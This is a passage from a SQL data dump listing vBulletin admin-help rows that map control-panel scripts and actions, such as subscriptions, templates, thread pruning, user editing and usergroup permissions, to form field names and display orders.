(4468, 'rssposter', 'edit', 'unstickthread', 190, 1, 'vbulletin'),
(4469, 'rssposter', 'edit', 'closethread', 200, 1, 'vbulletin'),
(4470, 'rssposter', 'edit', 'allowhtml', 210, 1, 'vbulletin'),
(4471, 'rssposter', 'edit', 'endannouncement', 220, 1, 'vbulletin'),
(4472, 'socialgroup_icon', 'switchtype', 'groupiconpath', 1, 1, 'vbulletin'),
(4473, 'socialgroup_icon', 'switchtype', 'groupiconurl', 1, 1, 'vbulletin'),
(4474, 'socialgroups', 'editcategory', 'description', 1, 1, 'vbulletin'),
(4475, 'socialgroups', 'editcategory', 'displayorder', 1, 1, 'vbulletin'),
(4476, 'socialgroups', 'editcategory', 'title', 1, 1, 'vbulletin'),
(4477, 'socialgroups', 'search', 'category', 1, 1, 'vbulletin'),
(4478, 'socialgroups', 'search', 'creator', 1, 1, 'vbulletin'),
(4479, 'socialgroups', 'search', 'date_gteq', 1, 1, 'vbulletin'),
(4480, 'socialgroups', 'search', 'date_lteq', 1, 1, 'vbulletin'),
(4481, 'socialgroups', 'search', 'filtertext', 1, 1, 'vbulletin'),
(4482, 'socialgroups', 'search', 'members_gteq', 1, 1, 'vbulletin'),
(4483, 'socialgroups', 'search', 'members_lteq', 1, 1, 'vbulletin'),
(4484, 'socialgroups', 'search', 'type', 1, 1, 'vbulletin'),
(4485, 'stats', '', '', 1, 1, 'vbulletin'),
(4486, 'stats', 'index', '', 1, 1, 'vbulletin'),
(4487, 'stats', 'reg,activity,thread,post', '', 1, 1, 'vbulletin'),
(4488, 'stats', 'reg,activity,thread,post', 'start', 10, 1, 'vbulletin'),
(4489, 'stats', 'reg,activity,thread,post', 'end', 20, 1, 'vbulletin'),
(4490, 'stats', 'reg,activity,thread,post', 'scope', 30, 1, 'vbulletin'),
(4491, 'stats', 'reg,activity,thread,post', 'sort', 40, 1, 'vbulletin'),
(4492, 'stats', 'reg,activity,thread,post', 'nullvalue', 50, 1, 'vbulletin'),
(4493, 'stats', 'top', '', 1, 1, 'vbulletin'),
(4494, 'subscriptionpermission', '', '', 1, 1, 'vbulletin'),
(4495, 'subscriptionpermission', 'edit', '', 1, 1, 'vbulletin'),
(4496, 'subscriptionpermission', 'edit', 'usesub', 10, 1, 'vbulletin'),
(4497, 'subscriptionpermission', 'modify', '', 1, 1, 'vbulletin'),
(4498, 'subscriptions', '', '', 1, 1, 'vbulletin'),
(4499, 'subscriptions', 'add', '', 1, 1, 'vbulletin'),
(4500, 'subscriptions', 'add', 'varname', 1, 1, 'vbulletin'),
(4501, 'subscriptions', 'add,edit', 'adminavatar', 1, 1, 'vbulletin'),
(4502, 'subscriptions', 'add,edit', 'adminprofilepic', 1, 1, 'vbulletin'),
(4503, 'subscriptions', 'add,edit', 'title', 10, 1, 'vbulletin'),
(4504, 'subscriptions', 'add,edit', 'description', 20, 1, 'vbulletin'),
(4505, 'subscriptions', 'add,edit', 'active', 30, 1, 'vbulletin'),
(4506, 'subscriptions', 'add,edit', 'length', 40, 1, 'vbulletin'),
(4507, 'subscriptions', 'add,edit', 'sub[cost][usd]', 50, 1, 'vbulletin'),
(4508, 'subscriptions', 'add,edit', 'sub[cost][gbp]', 60, 1, 'vbulletin'),
(4509, 'subscriptions', 'add,edit', 'sub[cost][eur]', 70, 1, 'vbulletin'),
(4510, 'subscriptions', 'add,edit', 'nusergroupid', 80, 1, 'vbulletin'),
(4511, 'subscriptions', 'add,edit', 'membergroup', 90, 1, 'vbulletin'),
(4512, 'subscriptions', 'add,edit', 'tax', 100, 1, 'vbulletin'),
(4513, 'subscriptions', 'add,edit', 'shipping', 110, 1, 'vbulletin'),
(4514, 'subscriptions', 'add,edit', 'displayorder', 115, 1, 'vbulletin'),
(4515, 'subscriptions', 'add,edit', 'recurring', 120, 1, 'vbulletin'),
(4516, 'subscriptions', 'adjust', '', 1, 1, 'vbulletin'),
(4517, 'subscriptions', 'adjust', 'username', 5, 1, 'vbulletin'),
(4518, 'subscriptions', 'adjust', 'regdate', 10, 1, 'vbulletin'),
(4519, 'subscriptions', 'adjust', 'expirydate', 20, 1, 'vbulletin'),
(4520, 'subscriptions', 'adjust', 'status', 30, 1, 'vbulletin'),
(4521, 'subscriptions', 'api', '', 1, 1, 'vbulletin'),
(4522, 'subscriptions', 'apiadd', '', 1, 1, 'vbulletin'),
(4523, 'subscriptions', 'apiadd,apiedit', 'title', 10, 1, 'vbulletin'),
(4524, 'subscriptions', 'apiadd,apiedit', 'active', 20, 1, 'vbulletin'),
(4525, 'subscriptions', 'apiadd,apiedit', 'classname', 30, 1, 'vbulletin'),
(4526, 'subscriptions', 'apiadd,apiedit', 'currency', 40, 1, 'vbulletin'),
(4527, 'subscriptions', 'apiadd,apiedit', 'recurring', 50, 1, 'vbulletin'),
(4528, 'subscriptions', 'apiedit', '', 1, 1, 'vbulletin'),
(4529, 'subscriptions', 'apirem', '', 1, 1, 'vbulletin'),
(4530, 'subscriptions', 'edit', '', 1, 1, 'vbulletin'),
(4531, 'subscriptions', 'find', '', 1, 1, 'vbulletin'),
(4532, 'subscriptions', 'modify', '', 1, 1, 'vbulletin'),
(4533, 'subscriptions', 'remove', '', 1, 1, 'vbulletin'),
(4534, 'subscriptions', 'transactions', 'currency', 1, 1, 'vbulletin'),
(4535, 'subscriptions', 'transactions', 'end', 1, 1, 'vbulletin'),
(4536, 'subscriptions', 'transactions', 'exact', 1, 1, 'vbulletin'),
(4537, 'subscriptions', 'transactions', 'orderby', 1, 1, 'vbulletin'),
(4538, 'subscriptions', 'transactions', 'paymentapiid', 1, 1, 'vbulletin'),
(4539, 'subscriptions', 'transactions', 'scope', 1, 1, 'vbulletin'),
(4540, 'subscriptions', 'transactions', 'start', 1, 1, 'vbulletin'),
(4541, 'subscriptions', 'transactions', 'state', 1, 1, 'vbulletin'),
(4542, 'subscriptions', 'transactions', 'subscriptionid', 1, 1, 'vbulletin'),
(4543, 'subscriptions', 'transactions', 'transactionid', 1, 1, 'vbulletin'),
(4544, 'subscriptions', 'transactions', 'username', 1, 1, 'vbulletin'),
(4545, 'template', '', '', 1, 1, 'vbulletin'),
(4546, 'template', 'add', 'dostyleid', 10, 1, 'vbulletin'),
(4547, 'template', 'add,edit', '', 1, 1, 'vbulletin'),
(4548, 'template', 'add,edit', 'title', 20, 1, 'vbulletin'),
(4549, 'template', 'add,edit', 'template', 30, 1, 'vbulletin'),
(4550, 'template', 'addstyle', '', 1, 1, 'vbulletin'),
(4551, 'template', 'addstyle,editstyle,files', 'parentid', 10, 1, 'vbulletin'),
(4552, 'template', 'addstyle,editstyle,files', 'title', 20, 1, 'vbulletin'),
(4553, 'template', 'addstyle,editstyle,files', 'userselect', 30, 1, 'vbulletin'),
(4554, 'template', 'addstyle,editstyle,files', 'displayorder', 40, 1, 'vbulletin'),
(4555, 'template', 'delete', '', 1, 1, 'vbulletin'),
(4556, 'template', 'deletestyle', '', 1, 1, 'vbulletin'),
(4557, 'template', 'editstyle', '', 1, 1, 'vbulletin'),
(4558, 'template', 'files', '', 1, 1, 'vbulletin'),
(4559, 'template', 'files', 'dostyleid', 10, 1, 'vbulletin'),
(4560, 'template', 'files', 'product', 15, 1, 'vbulletin'),
(4561, 'template', 'files', 'filename', 30, 1, 'vbulletin'),
(4562, 'template', 'files', 'mode', 40, 1, 'vbulletin'),
(4563, 'template', 'files', 'stylefile', 50, 1, 'vbulletin'),
(4564, 'template', 'files', 'serverfile', 60, 1, 'vbulletin'),
(4565, 'template', 'files', 'overwritestyleid', 70, 1, 'vbulletin'),
(4566, 'template', 'files', 'anyversion', 80, 1, 'vbulletin'),
(4567, 'template', 'findupdates', '', 1, 1, 'vbulletin'),
(4568, 'template', 'history', '', 1, 1, 'vbulletin'),
(4569, 'template', 'historysubmit', '', 1, 1, 'vbulletin'),
(4570, 'template', 'modify', '', 1, 1, 'vbulletin'),
(4571, 'template', 'rebuild', '', 1, 1, 'vbulletin'),
(4572, 'template', 'revertall', '', 1, 1, 'vbulletin'),
(4573, 'template', 'search', '', 1, 1, 'vbulletin'),
(4574, 'template', 'search', 'searchset', 10, 1, 'vbulletin'),
(4575, 'template', 'search', 'searchstring', 20, 1, 'vbulletin'),
(4576, 'template', 'search', 'titlesonly', 30, 1, 'vbulletin'),
(4577, 'template', 'search', 'dostyleid', 40, 1, 'vbulletin'),
(4578, 'template', 'search', 'replacestring', 50, 1, 'vbulletin'),
(4579, 'template', 'search', 'test', 60, 1, 'vbulletin'),
(4580, 'template', 'search', 'regex', 70, 1, 'vbulletin'),
(4581, 'template', 'search', 'case_insensitive', 80, 1, 'vbulletin'),
(4582, 'template', 'view', '', 1, 1, 'vbulletin'),
(4583, 'thread', '', '', 1, 1, 'vbulletin'),
(4584, 'thread', 'dothreads,pruneuser', '', 1, 1, 'vbulletin'),
(4585, 'thread', 'dothreadssel', '', 1, 1, 'vbulletin'),
(4586, 'thread', 'dovotes', '', 1, 1, 'vbulletin'),
(4587, 'thread', 'killpoll', '', 1, 1, 'vbulletin'),
(4588, 'thread', 'killpoll', 'threadid', 10, 1, 'vbulletin'),
(4589, 'thread', 'move', '', 1, 1, 'vbulletin'),
(4590, 'thread', 'move', 'destforumid', 5, 1, 'vbulletin'),
(4591, 'thread', 'prune', '', 1, 1, 'vbulletin'),
(4592, 'thread', 'prune', 'username', 180, 1, 'vbulletin'),
(4593, 'thread', 'prune,move', 'originaldaysolder', 10, 1, 'vbulletin'),
(4594, 'thread', 'prune,move', 'originaldaysnewer', 20, 1, 'vbulletin'),
(4595, 'thread', 'prune,move', 'lastdaysolder', 30, 1, 'vbulletin'),
(4596, 'thread', 'prune,move', 'lastdaysnewer', 40, 1, 'vbulletin'),
(4597, 'thread', 'prune,move', 'repliesleast', 50, 1, 'vbulletin'),
(4598, 'thread', 'prune,move', 'repliesmost', 60, 1, 'vbulletin'),
(4599, 'thread', 'prune,move', 'viewsleast', 70, 1, 'vbulletin'),
(4600, 'thread', 'prune,move', 'viewsmost', 80, 1, 'vbulletin'),
(4601, 'thread', 'prune,move', 'issticky', 90, 1, 'vbulletin'),
(4602, 'thread', 'prune,move', 'state', 92, 1, 'vbulletin'),
(4603, 'thread', 'prune,move', 'status', 94, 1, 'vbulletin'),
(4604, 'thread', 'prune,move', 'posteduser', 140, 1, 'vbulletin'),
(4605, 'thread', 'prune,move', 'titlecontains', 150, 1, 'vbulletin'),
(4606, 'thread', 'prune,move', 'forumid', 160, 1, 'vbulletin'),
(4607, 'thread', 'prune,move', 'subforums', 170, 1, 'vbulletin'),
(4608, 'thread', 'prune,move', 'prefixid', 200, 1, 'vbulletin'),
(4609, 'thread', 'pruneusersel', '', 1, 1, 'vbulletin'),
(4610, 'thread', 'removepoll', '', 1, 1, 'vbulletin'),
(4611, 'thread', 'tagmerge', 'tagtext', 1, 1, 'vbulletin'),
(4612, 'thread', 'tags', 'tagtext', 1, 1, 'vbulletin'),
(4613, 'thread', 'unsubscribe', '', 1, 1, 'vbulletin'),
(4614, 'thread', 'unsubscribe', 'ids', 10, 1, 'vbulletin'),
(4615, 'thread', 'unsubscribe', 'username', 20, 1, 'vbulletin'),
(4616, 'thread', 'unsubscribe', 'daysprune', 30, 1, 'vbulletin'),
(4617, 'thread', 'unsubscribe', 'forumid', 40, 1, 'vbulletin'),
(4618, 'thread', 'votes', '', 1, 1, 'vbulletin'),
(4619, 'thread', 'votes', 'pollid', 10, 1, 'vbulletin'),
(4620, 'thread', 'votes', 'threadtitle', 20, 1, 'vbulletin'),
(4621, 'user', '', '', 1, 1, 'vbulletin'),
(4622, 'user', 'add', '', 1, 1, 'vbulletin'),
(4623, 'user', 'add', 'password', 30, 1, 'vbulletin'),
(4624, 'user', 'add,edit', 'adminavatar', 1, 1, 'vbulletin'),
(4625, 'user', 'add,edit', 'adminprofilepic', 1, 1, 'vbulletin'),
(4626, 'user', 'add,edit', 'ipoints', 1, 1, 'vbulletin'),
(4627, 'user', 'add,edit', 'vm_enable', 1, 1, 'vbulletin'),
(4628, 'user', 'add,edit', 'warnings', 10, 1, 'vbulletin'),
(4629, 'user', 'add,edit', 'infractions', 20, 1, 'vbulletin'),
(4630, 'user', 'add,edit', 'username', 20, 1, 'vbulletin'),
(4631, 'user', 'add,edit', 'email', 40, 1, 'vbulletin'),
(4632, 'user', 'add,edit', 'languageid', 50, 1, 'vbulletin'),
(4633, 'user', 'add,edit', 'usertitle', 60, 1, 'vbulletin'),
(4634, 'user', 'add,edit', 'customtitle', 70, 1, 'vbulletin'),
(4635, 'user', 'add,edit', 'homepage', 80, 1, 'vbulletin'),
(4636, 'user', 'add,edit', 'birthday', 90, 1, 'vbulletin'),
(4637, 'user', 'add,edit', 'showbirthday', 95, 1, 'vbulletin'),
(4638, 'user', 'add,edit', 'signature', 100, 1, 'vbulletin'),
(4639, 'user', 'add,edit', 'icq', 110, 1, 'vbulletin'),
(4640, 'user', 'add,edit', 'aim', 120, 1, 'vbulletin'),
(4641, 'user', 'add,edit', 'yahoo', 130, 1, 'vbulletin'),
(4642, 'user', 'add,edit', 'msn', 140, 1, 'vbulletin'),
(4643, 'user', 'add,edit', 'skype', 145, 1, 'vbulletin'),
(4644, 'user', 'add,edit', 'coppauser', 150, 1, 'vbulletin'),
(4645, 'user', 'add,edit', 'parentemail', 160, 1, 'vbulletin'),
(4646, 'user', 'add,edit', 'posts', 170, 1, 'vbulletin'),
(4647, 'user', 'add,edit', 'referrerid', 180, 1, 'vbulletin'),
(4648, 'user', 'add,edit', 'ipaddress', 190, 1, 'vbulletin'),
(4649, 'user', 'add,edit', 'usergroupid', 200, 1, 'vbulletin'),
(4650, 'user', 'add,edit', 'membergroupids', 210, 1, 'vbulletin'),
(4651, 'user', 'add,edit', 'showreputation', 220, 1, 'vbulletin'),
(4652, 'user', 'add,edit', 'reputation', 230, 1, 'vbulletin'),
(4653, 'user', 'add,edit', 'reputationpower', 235, 1, 'vbulletin'),
(4654, 'user', 'add,edit', 'adminemail', 240, 1, 'vbulletin'),
(4655, 'user', 'add,edit', 'showemail', 250, 1, 'vbulletin'),
(4656, 'user', 'add,edit', 'invisible', 260, 1, 'vbulletin'),
(4657, 'user', 'add,edit', 'showvcard', 265, 1, 'vbulletin'),
(4658, 'user', 'add,edit', 'receivepm', 270, 1, 'vbulletin'),
(4659, 'user', 'add,edit', 'receivepmbuddies', 275, 1, 'vbulletin'),
(4660, 'user', 'add,edit', 'emailonpm', 280, 1, 'vbulletin'),
(4661, 'user', 'add,edit', 'pmpopup', 290, 1, 'vbulletin'),
(4662, 'user', 'add,edit', 'showsignatures', 300, 1, 'vbulletin'),
(4663, 'user', 'add,edit', 'showavatars', 310, 1, 'vbulletin'),
(4664, 'user', 'add,edit', 'showimages', 320, 1, 'vbulletin'),
(4665, 'user', 'add,edit', 'showusercss', 323, 1, 'vbulletin'),
(4666, 'user', 'add,edit', 'receivefriendemailrequest', 326, 1, 'vbulletin'),
(4667, 'user', 'add,edit', 'autosubscribe', 330, 1, 'vbulletin'),
(4668, 'user', 'add,edit', 'threadedmode', 340, 1, 'vbulletin'),
(4669, 'user', 'add,edit', 'showvbcode', 350, 1, 'vbulletin'),
(4670, 'user', 'add,edit', 'styleid', 360, 1, 'vbulletin'),
(4671, 'user', 'add,edit', 'timezoneoffset', 370, 1, 'vbulletin'),
(4672, 'user', 'add,edit', 'dstauto', 380, 1, 'vbulletin'),
(4673, 'user', 'add,edit', 'dstonoff', 390, 1, 'vbulletin'),
(4674, 'user', 'add,edit', 'daysprune', 400, 1, 'vbulletin'),
(4675, 'user', 'add,edit', 'joindate', 410, 1, 'vbulletin'),
(4676, 'user', 'add,edit', 'lastactivity', 430, 1, 'vbulletin'),
(4677, 'user', 'add,edit', 'lastpost', 440, 1, 'vbulletin'),
(4678, 'user', 'changehistory', '', 1, 1, 'vbulletin'),
(4679, 'user', 'doips', '', 1, 1, 'vbulletin'),
(4680, 'user', 'doips', 'ipaddress', 10, 1, 'vbulletin'),
(4681, 'user', 'doips', 'username', 20, 1, 'vbulletin'),
(4682, 'user', 'doips', 'depth', 30, 1, 'vbulletin'),
(4683, 'user', 'edit', '', 1, 1, 'vbulletin'),
(4684, 'user', 'edit', 'receivepmbuddies', 1, 1, 'vbulletin'),
(4685, 'user', 'edit', 'vm_contactonly', 1, 1, 'vbulletin'),
(4686, 'user', 'edit', 'password', 30, 1, 'vbulletin'),
(4687, 'user', 'editaccess', '', 1, 1, 'vbulletin'),
(4688, 'user', 'emailpassword', '', 1, 1, 'vbulletin'),
(4689, 'user', 'find', '', 1, 1, 'vbulletin'),
(4690, 'user', 'find2', '', 1, 1, 'vbulletin'),
(4691, 'user', 'moderate', '', 1, 1, 'vbulletin'),
(4692, 'user', 'moderate', 'send_validated', 10, 1, 'vbulletin'),
(4693, 'user', 'moderate', 'send_deleted', 20, 1, 'vbulletin'),
(4694, 'user', 'modify', '', 1, 1, 'vbulletin'),
(4695, 'user', 'modify', 'username', 70, 1, 'vbulletin'),
(4696, 'user', 'modify', 'usergroupid', 90, 1, 'vbulletin'),
(4697, 'user', 'modify', 'membergroup', 100, 1, 'vbulletin'),
(4698, 'user', 'modify', 'adminemail', 105, 1, 'vbulletin'),
(4699, 'user', 'modify', 'email', 110, 1, 'vbulletin'),
(4700, 'user', 'modify', 'parentemail', 120, 1, 'vbulletin'),
(4701, 'user', 'modify', 'coppauser', 130, 1, 'vbulletin'),
(4702, 'user', 'modify', 'homepage', 140, 1, 'vbulletin'),
(4703, 'user', 'modify', 'icq', 150, 1, 'vbulletin'),
(4704, 'user', 'modify', 'aim', 160, 1, 'vbulletin'),
(4705, 'user', 'modify', 'yahoo', 170, 1, 'vbulletin'),
(4706, 'user', 'modify', 'msn', 175, 1, 'vbulletin'),
(4707, 'user', 'modify', 'skype', 176, 1, 'vbulletin'),
(4708, 'user', 'modify', 'signature', 180, 1, 'vbulletin'),
(4709, 'user', 'modify', 'usertitle', 190, 1, 'vbulletin'),
(4710, 'user', 'modify', 'joindateafter', 200, 1, 'vbulletin'),
(4711, 'user', 'modify', 'joindatebefore', 210, 1, 'vbulletin'),
(4712, 'user', 'modify', 'lastactivityafter', 213, 1, 'vbulletin'),
(4713, 'user', 'modify', 'lastactivitybefore', 217, 1, 'vbulletin'),
(4714, 'user', 'modify', 'lastvisitafter', 220, 1, 'vbulletin'),
(4715, 'user', 'modify', 'lastvisitbefore', 230, 1, 'vbulletin'),
(4716, 'user', 'modify', 'lastpostafter', 240, 1, 'vbulletin'),
(4717, 'user', 'modify', 'lastpostbefore', 250, 1, 'vbulletin'),
(4718, 'user', 'modify', 'birthdayafter', 260, 1, 'vbulletin'),
(4719, 'user', 'modify', 'birthdaybefore', 270, 1, 'vbulletin'),
(4720, 'user', 'modify', 'postslower', 280, 1, 'vbulletin'),
(4721, 'user', 'modify', 'postsupper', 290, 1, 'vbulletin'),
(4722, 'user', 'modify', 'reputationlower', 300, 1, 'vbulletin'),
(4723, 'user', 'modify', 'reputationupper', 310, 1, 'vbulletin'),
(4724, 'user', 'modify', 'ipaddress', 320, 1, 'vbulletin'),
(4725, 'user', 'modify', 'warningslower', 320, 1, 'vbulletin'),
(4726, 'user', 'modify', 'warningsupper', 340, 1, 'vbulletin'),
(4727, 'user', 'modify', 'infractionslower', 350, 1, 'vbulletin'),
(4728, 'user', 'modify', 'infractionsupper', 360, 1, 'vbulletin'),
(4729, 'user', 'modify', 'pointslower', 370, 1, 'vbulletin'),
(4730, 'user', 'modify', 'pointsupper', 380, 1, 'vbulletin'),
(4731, 'user', 'modify', 'display[username]', 390, 1, 'vbulletin'),
(4732, 'user', 'modify', 'useridlower', 390, 1, 'vbulletin'),
(4733, 'user', 'modify', 'useridupper', 395, 1, 'vbulletin'),
(4734, 'user', 'modify', 'display[options]', 400, 1, 'vbulletin'),
(4735, 'user', 'modify', 'display[usergroup]', 410, 1, 'vbulletin'),
(4736, 'user', 'modify', 'display[email]', 420, 1, 'vbulletin'),
(4737, 'user', 'modify', 'display[parentemail]', 430, 1, 'vbulletin'),
(4738, 'user', 'modify', 'display[coppauser]', 440, 1, 'vbulletin'),
(4739, 'user', 'modify', 'display[homepage]', 450, 1, 'vbulletin'),
(4740, 'user', 'modify', 'display[icq]', 460, 1, 'vbulletin'),
(4741, 'user', 'modify', 'display[aim]', 470, 1, 'vbulletin'),
(4742, 'user', 'modify', 'display[yahoo]', 480, 1, 'vbulletin'),
(4743, 'user', 'modify', 'display[msn]', 490, 1, 'vbulletin'),
(4744, 'user', 'modify', 'display[signature]', 500, 1, 'vbulletin'),
(4745, 'user', 'modify', 'display[usertitle]', 510, 1, 'vbulletin'),
(4746, 'user', 'modify', 'display[joindate]', 520, 1, 'vbulletin'),
(4747, 'user', 'modify', 'display[lastactivity]', 523, 1, 'vbulletin'),
(4748, 'user', 'modify', 'display[lastpost]', 540, 1, 'vbulletin'),
(4749, 'user', 'modify', 'display[posts]', 550, 1, 'vbulletin'),
(4750, 'user', 'modify', 'display[reputation]', 560, 1, 'vbulletin'),
(4751, 'user', 'modify', 'display[ipaddress]', 570, 1, 'vbulletin'),
(4752, 'user', 'modify', 'display[birthday]', 580, 1, 'vbulletin'),
(4753, 'user', 'modify', 'orderby', 590, 1, 'vbulletin'),
(4754, 'user', 'modify', 'limitstart', 610, 1, 'vbulletin'),
(4755, 'user', 'modify', 'limitnumber', 620, 1, 'vbulletin'),
(4756, 'user', 'prune', '', 1, 1, 'vbulletin'),
(4757, 'user', 'prune', 'usergroupid', 20, 1, 'vbulletin'),
(4758, 'user', 'prune', 'daysprune', 30, 1, 'vbulletin'),
(4759, 'user', 'prune', 'joindate', 40, 1, 'vbulletin'),
(4760, 'user', 'prune', 'minposts', 50, 1, 'vbulletin'),
(4761, 'user', 'prune', 'order', 60, 1, 'vbulletin'),
(4762, 'user', 'pruneusers', '', 1, 1, 'vbulletin'),
(4763, 'user', 'remove', '', 1, 1, 'vbulletin'),
(4764, 'usergroup', '', '', 1, 1, 'vbulletin'),
(4765, 'usergroup', 'add', '', 1, 1, 'vbulletin'),
(4766, 'usergroup', 'add', 'ugid_base', 750, 1, 'vbulletin'),
(4767, 'usergroup', 'add,edit', 'cananimateavatar', 1, 1, 'vbulletin'),
(4768, 'usergroup', 'add,edit', 'cananimateprofilepic', 1, 1, 'vbulletin'),
(4769, 'usergroup', 'edit', 'canemailmember', 1, 1, 'vbulletin'),
(4770, 'usergroup', 'edit', 'cangivearbinfraction', 1, 1, 'vbulletin'),
(4771, 'usergroup', 'add,edit', 'cansearchft_bool', 1, 1, 'vbulletin'),
(4772, 'usergroup', 'add,edit', 'canusefriends', 1, 1, 'vbulletin'),
(4773, 'usergroup', 'add,edit', 'canviewthreads', 1, 1, 'vbulletin'),
(4774, 'usergroup', 'add,edit', 'isnotmoderated', 1, 1, 'vbulletin'),
(4775, 'usergroup', 'add,edit', 'title', 10, 1, 'vbulletin'),
(4776, 'usergroup', 'add,edit', 'description', 20, 1, 'vbulletin'),
(4777, 'usergroup', 'add,edit', 'usertitle', 30, 1, 'vbulletin'),
(4778, 'usergroup', 'add,edit', 'htmltags', 40, 1, 'vbulletin'),
(4779, 'usergroup', 'add,edit', 'passwordexpires', 50, 1, 'vbulletin'),
(4780, 'usergroup', 'add,edit', 'passwordhistory', 60, 1, 'vbulletin'),
(4781, 'usergroup', 'add,edit', 'showgroup', 70, 1, 'vbulletin'),
(4782, 'usergroup', 'add,edit', 'showbirthday', 80, 1, 'vbulletin'),
(4783, 'usergroup', 'add,edit', 'showmemberlist', 90, 1, 'vbulletin'),
(4784, 'usergroup', 'add,edit', 'allowmembergroups', 100, 1, 'vbulletin'),
(4785, 'usergroup', 'add,edit', 'isnotbannedgroup', 110, 1, 'vbulletin'),
(4786, 'usergroup', 'add,edit', 'ispublicgroup', 120, 1, 'vbulletin'),
(4787, 'usergroup', 'add,edit', 'canoverride', 130, 1, 'vbulletin'),
(4788, 'usergroup', 'add,edit', 'canseehidden', 140, 1, 'vbulletin'),
(4789, 'usergroup', 'add,edit', 'canviewmembers', 150, 1, 'vbulletin'),
(4790, 'usergroup', 'add,edit', 'canmodifyprofile', 160, 1, 'vbulletin'),
(4791, 'usergroup', 'add,edit', 'caninvisible', 170, 1, 'vbulletin'),
(4792, 'usergroup', 'add,edit', 'showeditedby', 180, 1, 'vbulletin'),
(4793, 'usergroup', 'add,edit', 'canseeraters', 190, 1, 'vbulletin'),
(4794, 'usergroup', 'add,edit', 'canjoingroups', 200, 1, 'vbulletin'),
(4795, 'usergroup', 'add,edit', 'canusecustomtitle', 200, 1, 'vbulletin'),
(4796, 'usergroup', 'add,edit', 'canusesignature', 210, 1, 'vbulletin'),
(4797, 'usergroup', 'add,edit', 'canseeprofilepic', 220, 1, 'vbulletin'),
(4798, 'usergroup', 'add,edit', 'canseehiddencustomfields', 225, 1, 'vbulletin'),
(4799, 'usergroup', 'add,edit', 'canview', 230, 1, 'vbulletin'),
(4800, 'usergroup', 'add,edit', 'canviewothers', 240, 1, 'vbulletin'),
(4801, 'usergroup', 'add,edit', 'canseedelnotice', 250, 1, 'vbulletin'),
(4802, 'usergroup', 'add,edit', 'cansearch', 260, 1, 'vbulletin'),
(4803, 'usergroup', 'add,edit', 'canemail', 270, 1, 'vbulletin'),
(4804, 'usergroup', 'add,edit', 'cangetattachment', 280, 1, 'vbulletin'),
(4805, 'usergroup', 'add,edit', 'canpostnew', 290, 1, 'vbulletin'),
(4806, 'usergroup', 'add,edit', 'canreplyown', 300, 1, 'vbulletin'),
(4807, 'usergroup', 'add,edit', 'canreplyothers', 310, 1, 'vbulletin'),
(4808, 'usergroup', 'add,edit', 'caneditpost', 320, 1, 'vbulletin'),
(4809, 'usergroup', 'add,edit', 'candeletepost', 330, 1, 'vbulletin'),
(4810, 'usergroup', 'add,edit', 'canmove', 340, 1, 'vbulletin'),
(4811, 'usergroup', 'add,edit', 'canopenclose', 350, 1, 'vbulletin'),
(4812, 'usergroup', 'add,edit', 'candeletethread', 360, 1, 'vbulletin'),
(4813, 'usergroup', 'add,edit', 'followforummoderation', 370, 1, 'vbulletin'),
(4814, 'usergroup', 'add,edit', 'cantagown', 371, 1, 'vbulletin'),
(4815, 'usergroup', 'add,edit', 'picturefollowforummoderation', 371, 1, 'vbulletin'),
(4816, 'usergroup', 'add,edit', 'cantagothers', 372, 1, 'vbulletin'),
(4817, 'usergroup', 'add,edit', 'commentfollowforummoderation', 372, 1, 'vbulletin'),
(4818, 'usergroup', 'add,edit', 'candeletetagown', 373, 1, 'vbulletin'),
(4819, 'usergroup', 'add,edit', 'cancreatetag', 374, 1, 'vbulletin'),
(4820, 'usergroup', 'add,edit', 'canpostattachment', 390, 1, 'vbulletin'),
(4821, 'usergroup', 'add,edit', 'attachlimit', 400, 1, 'vbulletin'),
(4822, 'usergroup', 'add,edit', 'canpostpoll', 410, 1, 'vbulletin'),
(4823, 'usergroup', 'add,edit', 'canvote', 420, 1, 'vbulletin'),
(4824, 'usergroup', 'add,edit', 'canuseavatar', 430, 1, 'vbulletin'),
(4825, 'usergroup', 'add,edit', 'avatarmaxwidth', 440, 1, 'vbulletin'),
(4826, 'usergroup', 'add,edit', 'avatarmaxheight', 450, 1, 'vbulletin'),
(4827, 'usergroup', 'add,edit', 'avatarmaxsize', 460, 1, 'vbulletin'),
(4828, 'usergroup', 'add,edit', 'cansigpic', 465, 1, 'vbulletin'),
(4829, 'usergroup', 'add,edit', 'cananimatesigpic', 470, 1, 'vbulletin'),
(4830, 'usergroup', 'add,edit', 'canprofilepic', 470, 1, 'vbulletin'),
(4831, 'usergroup', 'add,edit', 'sigpicmaxheight', 475, 1, 'vbulletin'),
(4832, 'usergroup', 'add,edit', 'sigpicmaxwidth', 475, 1, 'vbulletin'),
(4833, 'usergroup', 'add,edit', 'profilepicmaxwidth', 480, 1, 'vbulletin'),
(4834, 'usergroup', 'add,edit', 'sigpicmaxsize', 485, 1, 'vbulletin'),
(4835, 'usergroup', 'add,edit', 'profilepicmaxheight', 490, 1, 'vbulletin'),
(4836, 'usergroup', 'add,edit', 'profilepicmaxsize', 500, 1, 'vbulletin'),
(4837, 'usergroup', 'add,edit', 'pmquota', 510, 1, 'vbulletin'),
(4838, 'usergroup', 'add,edit', 'canignorequota', 515, 1, 'vbulletin'),
(4839, 'usergroup', 'add,edit', 'cantrackpm', 520, 1, 'vbulletin'),
(4840, 'usergroup', 'add,edit', 'candenypmreceipts', 530, 1, 'vbulletin'),
(4841, 'usergroup', 'add,edit', 'pmsendmax', 540, 1, 'vbulletin'),
(4842, 'usergroup', 'add,edit', 'canviewcalendar', 550, 1, 'vbulletin'),
(4843, 'usergroup', 'add,edit', 'canpostevent', 560, 1, 'vbulletin'),
(4844, 'usergroup', 'add,edit', 'caneditevent', 570, 1, 'vbulletin'),
(4845, 'usergroup', 'add,edit', 'candeleteevent', 580, 1, 'vbulletin'),
(4846, 'usergroup', 'add,edit', 'canviewothersevent', 590, 1, 'vbulletin'),
(4847, 'usergroup', 'add,edit', 'canwhosonline', 600, 1, 'vbulletin'),
(4848, 'usergroup', 'add,edit', 'canwhosonlinefull', 610, 1, 'vbulletin'),
(4849, 'usergroup', 'add,edit', 'canwhosonlineip', 620, 1, 'vbulletin'),
(4850, 'usergroup', 'add,edit', 'canwhosonlinebad', 630, 1, 'vbulletin'),
(4851, 'usergroup', 'add,edit', 'canwhosonlinelocation', 640, 1, 'vbulletin'),
(4852, 'usergroup', 'add,edit', 'canviewownusernotes', 650, 1, 'vbulletin'),
(4853, 'usergroup', 'add,edit', 'canmanageownusernotes', 660, 1, 'vbulletin'),
(4854, 'usergroup', 'add,edit', 'canpostownusernotes', 670, 1, 'vbulletin'),
(4855, 'usergroup', 'add,edit', 'canviewothersusernotes', 680, 1, 'vbulletin'),
